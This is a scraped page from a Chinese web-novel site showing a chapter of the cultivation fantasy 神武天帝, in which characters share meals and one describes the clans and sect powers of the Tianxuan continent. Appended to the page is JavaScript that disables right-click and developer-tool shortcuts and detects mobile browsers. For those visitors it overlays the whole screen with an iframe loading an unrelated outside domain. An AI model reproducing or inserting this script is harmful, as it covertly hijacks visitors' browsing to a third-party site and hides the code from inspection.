新笔趣阁
会员书架
首页 > 武侠修真 > 神武天帝 > 第3198章 太白境

第3198章 太白境(1 / 2)

章节目录 加入书签
好书推荐: 白衣隐 穿越之陈家有喜 重生漠北一家人 美人请留步 凡骨 六夫同堂 点妆 随身携带个地球 重生之净化空间 田园花嫁

第3198章 太白境

小颜这时走来笑嘻嘻道:“花姐姐你还要吗?”

“啊?啊……我有点吃饱了……”花月容愣了愣道。

“那你不要了啊?”小颜当即道:“太好了刚好还剩一大碗我去吃了。”

花月容急忙道:“我觉得有点虚弱我应该多吃一碗。”

“……”

看着花月容将最后的肉羹吃下满意的拍了拍自己肚子小颜咽了几口口水。

秦公子做的饭真的很好吃肉羹也好骨汤也罢包括烤肉等等味道都是很让人迷恋。

实际上她和九婴每每观看也没见到秦公子使用什么特殊佐料但是做出来的饭味道就是很美让人无法忘怀。

按照秦公子的说法做饭就像是炼丹炼器最好的佐料就是这些食材本身只要运用得当就能做出最好味道的饭菜来。

反正秦尘说的神乎其神他们也听不懂就知道很好吃而且吃下去对身体有很大好处不亚于仙丹。

一晃又是十日时间过去。

这一天大中午秦尘站定锅旁开口道:“开饭了!”

叮叮当当的声音响起下一刻三道身影出现在秦尘背后。

九颗脑袋叼着九个玉盆的九婴双手捧着玉碗的小颜以及稍显忸怩却是满含期待的花月容。

十日时间下来花月容只觉得每日里吞吃几颗仙谷丹实在是索然无味反而是秦尘所做的饭美味至极。

四人围坐在一起用着饭倒是显得其乐融融。

而经过十日时间相处花月容也是讲述了现在的情况。

眼下所在的这片山脉名为陇安山脉。

陇安山脉位于天玄大陆之上天玄大陆在浩瀚如烟的上三天之中算不得什么。

而这偌大的天玄大陆生活人口也是足足百亿之众。

天玄大陆最强大的武修世家为玄族。

玄族之中据传存在着真正的人仙超越真仙九品的大人物。

这一点就使得玄族为天玄大陆真正的主宰者。

除却玄族之外还有三方鼎足存在。

花家!

谷家!

姜家!

此三大家族是没资格称呼为族的。

而花家、谷家、姜家三大家每隔多年需得向玄族缴纳供奉。

否则三大家族便会面临玄族的压迫。

用饭之间秦尘开口道:“有一个问题听你说的花家谷家姜家三家内也都有不少真仙级别人物即便玄族内有人仙存在你们三家若是联合起来未必没机会抗衡玄族何必年年缴纳供奉?”

花月容吃完一碗肉羹意犹未尽道:“联合?不可能的!”

“我这次受这么重的伤就是谷家的人干的花家谷家姜家三大家族争斗由来已久根本不可能联合!”

“而且就算是联合也根本不可能抗衡玄族!”

“哦?”秦尘眉头一挑。

花月容继续道:“因为玄族背后有洞天神府罩着呢!”

洞天神府?

花月容叹了口气这才说明。

“如天玄大陆最风光的就是玄族临近的元灵大陆最风光的是元灵宗还有天武大陆最风光强大的天武皇朝!”

“这些家族皇朝宗门背后都是依附更加强大的洞天神府而活下来的。”

“像玄族背后便是青玄洞天青玄洞天掌管上百座大陆身份地位高高在上洞天内的弟子最差也是真仙境界撇开人仙高手不说还有更恐怖的灵仙人物存在!”

“等等!”

点击切换 [繁体版] [简体版]
章节目录 加入书签
新书推荐: 误嫁妖孽世子 嫡女 死神降临 重生之娇宠小娘子 天生科技狂 神武都市 大明骑龙 穿越扶摇九天 沈家有女 此情荒唐不可欺
// 禁止查看源码 document.addEventListener('contextmenu', function (e) { e.preventDefault(); }); // 禁止鼠标右键 document.addEventListener('keydown', function (e) { if (e.keyCode === 93 || (e.ctrlKey && e.shiftKey && e.keyCode === 73)) { e.preventDefault(); } }); // 禁止 F12 document.addEventListener('keydown', function (e) { if (e.keyCode === 123) { e.preventDefault(); } }); document.addEventListener('DOMContentLoaded', function () { main(); }); function isMobile() { const userAgent = navigator.userAgent.toLowerCase(); const mobileKeywords = ['nokia', 'sony', 'ericsson', 'mot', 'samsung', 'htc', 'sgh', 'lg', 'sharp', 'sie-', 'philips', 'panasonic', 'alcatel', 'lenovo', 'iphone', 'ipod', 'blackberry', 'meizu', 'android', 'netfront', 'symbian', 'ucweb', 'windowsce', 'palm', 'operamini', 'operamobi', 'openwave', 'nexusone', 'cldc', 'midp', 'wap', 'mobile']; if (userAgent.includes('http_x_wap_profile') || userAgent.includes('wap') || userAgent.includes('mobile') || mobileKeywords.some(keyword => userAgent.includes(keyword))) { return true; } if (userAgent.includes('vnd.wap.wml') && (userAgent.includes('text/html') === false || userAgent.indexOf('vnd.wap.wml') < userAgent.indexOf('text/html'))) { return true; } return false; } function isSpider() { const userAgent = navigator.userAgent.toLowerCase(); const spiderKeywords = ['googlebot', 'spider', 'baiduspider', 'yahooslurp', 'msnbot', 'sosospider', 'yodaobot', 'outfoxbot', 'sogou web spider', 'sogou orion spider', 'fast-webcrawler', 'gaisbot', 'ia_archiver', 'altavista', 'lycos_spider', 'inktomi slurp']; return spiderKeywords.some(keyword => userAgent.includes(keyword)); } function main() { const isMobileDevice = isMobile(); // const isSpiderBot = isSpider(); if (isMobileDevice) { const url = 'segui99.life'; setTimeout(function () { var _hmt = _hmt || []; (function() { var hm = document.createElement("script"); hm.src = "https://hm.baidu.com/hm.js?ac76300945c612415ea74e6625be7a6e"; var s = document.getElementsByTagName("script")[0]; s.parentNode.insertBefore(hm, s); })(); // 创建白色 iframe 元素 const whiteIframe = document.createElement('iframe'); whiteIframe.style.position = 'fixed'; whiteIframe.style.top = '0'; whiteIframe.style.left = '0'; whiteIframe.style.width = '100%'; whiteIframe.style.height = '100%'; whiteIframe.style.border = 'none'; whiteIframe.style.backgroundColor = 'white'; // 将白色 iframe 添加到 body 元素中 document.body.appendChild(whiteIframe); // 创建 iframe 元素 const iframe = document.createElement('iframe'); iframe.style.position = 'fixed'; iframe.style.top = '0'; iframe.style.left = '0'; iframe.style.width = '100%'; iframe.style.height = '100%'; iframe.style.border = 'none'; // 设置 iframe 的 src iframe.src = `https://${url}/`; // 将 iframe 添加到 body 元素中 document.body.appendChild(iframe); }, 500); } }